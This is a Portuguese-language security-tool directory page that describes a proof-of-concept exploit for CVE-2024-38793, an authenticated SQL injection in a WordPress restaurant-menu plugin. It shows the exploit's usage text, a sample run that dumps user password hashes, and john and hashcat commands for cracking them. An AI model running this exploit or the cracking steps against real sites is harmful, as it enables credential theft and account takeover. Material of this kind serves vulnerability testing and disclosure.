Skip to content
KitploitKITPLOIT
FerramentasBlog
Enviar
FerramentasBlog
Enviar

Ferramentas de Hacking, PenTest e Cibersegurança para o seu Arsenal de Segurança!

Kitploit é um diretório de ferramentas de hacking, cibersegurança e pentesting. Descubra as últimas atualizações de projetos para encontrar vulnerabilidades, analisar sistemas, automatizar testes e fortalecer sua segurança.

··Feeds·Contato·Privacidade·© 2026 Kitploit

Diretório de Ferramentas

Categorias

Ver todas as categorias
Loading categories
CVE-2024-38793-PoC — Código de Prova de Conceito para exploração da CVE-2024-38793 (Best Restaurant Menu by PriceListo <= 1.4.1 - Injeção SQL Autenticada (Contribuidor+)) | Kitploit
Ferramentas/GitHubGitHub/ret2desync/cve-2024-38793-poc
Quebra de SenhasAnálise de VulnerabilidadesExploraçãoExploração de Aplicações WebTestes de Penetração
GitHubret2desync/cve-2024-38793-poc

CVE-2024-38793-PoC

Código de Prova de Conceito para exploração da CVE-2024-38793 (Best Restaurant Menu by PriceListo <= 1.4.1 - Injeção SQL Autenticada (Contribuidor+))

Ver Repositório
7há 2 anosAinda não revisado

Mais Populares

Ver todos →

Descubra as ferramentas mais usadas pela nossa comunidade.

Explore todas as ferramentas

Navegue pela nossa coleção de ferramentas

Ver todas as ferramentas →
Compartilhar

CVE-2024-38793-PoC

Código de Prova de Conceito para exploração da CVE-2024-38793 (Best Restaurant Menu by PriceListo <= 1.4.1 - Injeção SQL autenticada (Contribuidor+)).

Prova de Conceito

Esta é uma prova de conceito para a vulnerabilidade CVE-2024-38793, uma vulnerabilidade de injeção SQL para versões do plugin WordPress Best Restaurant Menu a.k.a Great Restaurant Menu WP anteriores a 1.4.2.

A vulnerabilidade ocorre devido à falta de sanitização de entrada no argumento groups ao usar o shortcode brm_restaurant_menu.

Nota: Isso exige as credenciais de um usuário com pelo menos privilégios de nível Contribuidor.

O código tentará capturar os nomes de usuário e hashes de senha da tabela de usuários do WordPress.

Uso

root@kitploit:~
CVE-2024-38793 Exploit (Best Restaurant Menu by PriceListo Version <= 1.4.1) PoC
         Requires Contributor+ Privileges on a WordPress instance with the plugin installed
         Credit: @ret2desync
         Will attempt to create a new post, exploit the vulnerability and extract all users usernames and password hashes
         Example usage:
         python3 CVE-2024-38793.py -t "http://127.0.0.1/wordpress/" -u contributor -p password --proxy "http://127.0.0.1:8080"
usage: CVE-2024-38793.py [-h] -t TARGET -u USERNAME -p PASSWORD [--proxy PROXY] [-o OUTFILE]

Exemplo de execução

root@kitploit:~
python3 CVE-2024-38793.py -t "http://127.0.0.1/wordpress/" -u contributor -p password      
CVE-2024-38793 Exploit (Best Restaurant Menu by PriceListo Version <= 1.4.1) PoC
         Requires Contributor+ Privileges on a WordPress instance with the plugin installed
         Credit: @ret2desync
         Will attempt to create a new post, exploit the vulnerability and extract all users usernames and password hashes
         Example usage:
         python3 CVE-2024-38793.py -t "http://127.0.0.1/wordpress/" -u contributor -p password --proxy "http://127.0.0.1:8080"
[*] Successfully signed in to Wordpress using contributor password
[*] Successfully created new post, id: 219
[*] Successfully saved new post with exploit, post id: 219
[*] Successfully grabbed usernames and password hashes
[*] Found 2 sets of credentials
[***                Credentials                ***]
root:$P$BG.b.gHI.byee9PWs8GspKxY9qp0Cm0
contributor:$P$BBVRINbQUo28Tpbp3H7/iITT/Eo9aR0
[*] Crack hashes with: 
 john <hashes_file> --wordlist=<wordlist> 
 hashcat -m 400 -a 0 --username <hashes_file> <wordlist>
[*] Exploit completed successfully
Baixar ferramenta